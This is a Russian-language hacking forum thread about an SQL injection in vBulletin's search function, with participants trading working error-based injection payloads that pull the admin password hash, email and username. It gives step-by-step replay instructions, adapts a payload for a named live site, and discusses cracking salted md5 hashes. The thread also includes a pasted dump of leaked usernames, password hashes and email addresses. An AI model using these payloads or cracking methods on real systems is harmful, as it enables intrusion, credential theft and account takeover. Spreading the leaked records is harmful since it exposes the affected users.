Уязвимость [Ссылки могут видеть только зарегистрированные и активированные пользователи]
все вопросы задавать тут

humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

то что выделенно красным можно поменять на id другого юзера?

и еще такой вопрос,что если стоит антиспам бот к примеру такой (Проверка вопроса системы антиспама "NoSpam!")


s=&securitytoken=guest&do=process&searchthreadid=&query=32erddd&titleonly=0&searchuser=&starteronly=0&exactname=1&humanverify%5Binput%5D=ktag2s&humanverify%5Bhash%5D=7ee31ad89911458254ed1d2db6a2 1588&nospamnumber=0&nospam=********.net&replyless=0&replylimit=0&searchdate=0&beforeafter=after&sortby=lastpost&order=descending&showposts=0&tag=&forumchoice%5B%5D=0&childforums=1&dosearch=%CD%E0%F7%E0%F2%FC+%EF%EE%E8%F1%EA

ID можно менять

для запроса нужен только securitytoken вроде бы

А где тип хеша md5(md5($pass)$salt) расшифровать? Подскажите.

А где тип хеша md5(md5($pass)$salt) расшифровать? Подскажите.
в програме PasswordsPro или Extreme GPU Bruteforcer

2 вопроса
как узнать логин юзера 1 ? ведь логин и никнейм не одно и тоже
в соли присудствует такое
<
&
"
>
прочитал в инете
одни пишут что нужно удалить lt; amp; quot; gt;
другие пишут что нужно заменить их на символы какими они и являются & - &, " - "
так как делать правильно ?

" это двойная ковычка вроде. Я думаю не стоит удалять, проще заменить.

я удалял, потому что иначе соль больше 30 символов

Логин и никнейм в булке одно и тоже... вроде бы :D
это в ИПБ вроде логин и ник разные

я удалял, потому что иначе соль больше 30 символов

Логин и никнейм в булке одно и тоже... вроде бы :D
это в ИПБ вроде логин и ник разные
и после удаления удалось розшифровать пароль ?

Ребят, еще вопрос, сколько по времени Passwords Pro расшифровывает это дело? У меня показывает что около двух дней будет копать....

Ребят, еще вопрос, сколько по времени Passwords Pro расшифровывает это дело? У меня показывает что около двух дней будет копать....
зависит от способа дешифровки, словари , брут и тд и ещё от длины пароля
может занять и месяцы )

ещё вопрос в соли попадается знак двоеточие это норм ?
ато пасвордпро его не щитает за часть соли а за разделитель

Можете кто нить дать нормальный словарь, а то я смотрю многие очень быстро расшифровывают кучу паролей сольных.

Логин и никнейм в булке одно и тоже... вроде бы :D
это в ИПБ вроде логин и ник разные
токшо достал хеш и розшифровал его
присмотрелся к юзеру 1 а у него ник на русском ))
думаеш и логин тоже ? ))

не знаю даже
может и на русском логин)

да расшифровывал после убирания amp; итд

чтобы не показывало : как разделитель
загружай из буфера в виде акк:хеш:соль и все

чтобы не показывало : как разделитель
загружай из буфера в виде акк:хеш:соль и все
так и загружаю
[Ссылки могут видеть только зарегистрированные и активированные пользователи]:f5de53adcccdb58f51dd58e7972890d4:T9LW6 )e:L&&5tQ?~(gbcyKES_lS`EE
в пасворд про
[Ссылки могут видеть только зарегистрированные и активированные пользователи]:f5de53adcccdb58f51dd58e7972890d4:T9LW6 )e

так и загружаю
[Ссылки могут видеть только зарегистрированные и активированные пользователи]:f5de53adcccdb58f51dd58e7972890d4:T9LW6 )e:L&&5tQ?~(gbcyKES_lS`EE
в пасворд про
[Ссылки могут видеть только зарегистрированные и активированные пользователи]:f5de53adcccdb58f51dd58e7972890d4:T9LW6 )e

в ручную добавляй

в ручную добавляй
вотэтого и боялся (
а если база 30к+ ?

есть какието символы которые неиспользуются в соли ?
просто можна было бы сменить разделитель на этот символ )

комунибуть такое попадалось ?
sakura:0xf1261015e8b34b333fbdb78f4375ef08::[Ссылки могут видеть только зарегистрированные и активированные пользователи] [Ссылки могут видеть только зарегистрированные и активированные пользователи]
manz007:0xa7face3e6e06fd71f98e9c143e1d42e7::manz_j [Ссылки могут видеть только зарегистрированные и активированные пользователи]
manz_007:0xa0f02beb07c7e5e852af716d18b41abb::manz_ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
katak789:0x3a2ea443ebbdc80553d50615fc5f7333::alria [Ссылки могут видеть только зарегистрированные и активированные пользователи]
wanam123:0x409843c42519b37a232883db4d0e1660::wanam [Ссылки могут видеть только зарегистрированные и активированные пользователи]
castle3:0x20b2317fb7b5eb051681aa518551b15c::anyloh @yahoo.com.sg
castle4:0x4a111eb3de49620c6871a54f7a8f19f9::anyloh @yahoo.com.sg
triedge:0x528eb3a3873318d88c0c132f6608711b::riezer [Ссылки могут видеть только зарегистрированные и активированные пользователи]
mofumofu:0xec78ad29a5886aff0f963b469634dfe5::merid [Ссылки могут видеть только зарегистрированные и активированные пользователи]
srdejoker:0xd15bb78421e149879e6cd9dedbfb7de5::ange [Ссылки могут видеть только зарегистрированные и активированные пользователи]
pager82:0xce6f5dc249b3ea1e2e6a1811c6e28e91::agus@y ahoo.com
fajar06:0xb7fed1969b65507ad21a2c7c3f32ca40::riyyuk [Ссылки могут видеть только зарегистрированные и активированные пользователи]
соли нет вообще, хеш смахивает на хекс, удалил 0х попробовал как мд5 из 10к ток 20 акков розшифровало по словарям )


кстати мож кому нужно
это запрос на мыло
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select email from user where userid=1 and row(1,1)>(select count(*),concat( (select user.email) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
это запрос на юзернейм
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select username from user where userid=1 and row(1,1)>(select count(*),concat( (select user.username) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

пробелов в хешах\соли быть не должно...
убирай блокнотом

пробелов в хешах\соли быть не должно...
убирай блокнотом
ты эт к чему ? у меня вродь нигде пробелов нет )

так и загружаю
[Ссылки могут видеть только зарегистрированные и активированные пользователи]:f5de53adcccdb58f51dd58e7972890d4:T9LW6 )e:L&&5tQ?~ (gbcyKES_lS`EE
я тут увидел пробел
с ним не расшифруешь

и у меня нормально загружается , даже если в соли есть :

00000000000000000000000000000000000000000000000000 0000000000

у меня всё без пробелов , это сам форум вставляет пробелы если слово длинное какнить попробуй , выше я написал 60 нулей без пробелов
с солью розобрался пасворд про делил соль, у мнея (3.1.1.0)
поменял разделитель : на № такой знак в соли пока не встречался

а что если нет таблицы? то никак незя?
например:
Ошибка MySQL: Table '****_forum.user' doesn't exist

думаю таблица есть полюбому просто по другому называется
и тут нужно вписать правильное название таблицы from user
владелец сайта может назвать таблицу как хочет, просто большинство оставляют по умолчанию

скорей всего и тут нужно будет изменить concat( (select user.password)

Можно ли это всё проделать без файрфокса? Или альтернативы этому плагину нет? :)

если найдёш плагин к своему браузеру который сможет подменить запросы то можно
когдато тоже было задумался над этим )
в итоге просто скачал портабл версию мозилы )

Добавлено через 7 часов 10 минут
ещё одна загадка
нашёл 1 форум с этой уязвимостью
сливаю базу
хеш норм
а соль вида "pandamad1824505432"
"pandamad9476239054"
и тд слово пандамад и 10 цыфр
ктонить с таким сталкивался ? это соль ?

ищем POST запрос, он будет первый...
жмете на него и Повтор
нашел, нажал.
редактируете его так, чтобы у вас остался только
securitytoken
....
....
....
должно быть так

securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*


редактировал, нажимаю "повтор" и 0 реакции. Что я не так делаю ?

нашел, нажал.

редактировал, нажимаю "повтор" и 0 реакции. Что я не так делаю ?

если форум уязвимый то после всего ты увидиш окно с ошибкой в коде найдеш пароль или то что ищеш
если форум НЕ уязвимый то вродь (уже непомню) ты увидиш окно розширенного поиска
вот уязвимый форум можеш потренироватся
[Ссылки могут видеть только зарегистрированные и активированные пользователи]

P.S. Люди в тюрьмах столько не сидят,сколько вы за компьютером
может стоит написать МЫ ))

если форум уязвимый то после всего ты увидиш окно с ошибкой в коде найдеш пароль или то что ищеш
если форум НЕ уязвимый то вродь (уже непомню) ты увидиш окно розширенного поиска
вот уязвимый форум можеш потренироватся
[Ссылки могут видеть только зарегистрированные и активированные пользователи]


Вряд ли, использую ссылки которые указал автор темы:
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]

если есть скайп скинь в пм
покажу свой рабочий стол увидиш шаг за шагом как это делается

Ух и бред, скачал portable firefox и все заработало.

я только не понял как решить проблему с префиксом...
Ошибка MySQL : Table 'udk8w846_vb.user' doesn't exist
вот выдает...
хотя я указываю таблицу user

Ошибка MySQL : Table 'udk8w846_vb.user' doesn't exist
udk8w846_vb = база
user = таблица
в этой базе нет такой таблицы
нужно угадать
если очень нужно даш под ник сайт
с вероятность 90% дам те список таблиц

сайт ll2.ru
Дай мне рабочий запрос для него) а там уж я сам разберусь как это исправить

сайт ll2.ru
Дай мне рабочий запрос для него) а там уж я сам разберусь как это исправить

securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from bvuser where userid=1 and row(1,1)>(select count(*),concat( (select bvuser.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

я не могу установить дополениние Live HTTP Headers у меня написало : Просмотр HTTP заголовков не может быть установлено так как оно не совместимо с FireFox 5.01 или 6.1 или 7.1 .На трех версиях не прокатило что делать?

Помогите. нет таблицы. Как ее найти(ее имя)?
например:
Ошибка MySQL: Table '***_forum.user' doesn't exist

При заливке кода выскакивает вот такое:
[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Может кто-то подскажет, есть шансы на узнавание логина и пасс...

При вставке кода в прооверочный форум ктото сказал что там работает...
и на других тоже.. у меня просто открывается снова Поиск!

[Ссылки могут видеть только зарегистрированные и активированные пользователи][]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99%29%20union%20select%20password%20from%20user%20 where%20userid=1%20and%20row%281,1%29%3E%28select% 20count%28*%29,concat%28%20%28select%20user.passwo rd%29%20,0x3a,floor%28rand%280%29*2%29%29%20x%20fr om%20%28select%201%20union%20select%202%20union%20 select%203%29a%20group%20by%20x%20limit%201%29%20--%20/*

Актуально для фогейм форума?

Добавлено через 18 минут
Вот кстати я разобрался немного. Фогеи немного изменили структуру проверки версии Булки Вот теперь как проверить ее [Ссылки могут видеть только зарегистрированные и активированные пользователи]

Актуально ли для 4.2.0 ?

[Ссылки могут видеть только зарегистрированные и активированные пользователи] - нужно взломать, чтобы вытащить прикрепленный файл, зарегистрироваться невозможно, на втором этапе регистрации всегда ошибка 500. Сайт на vBulletin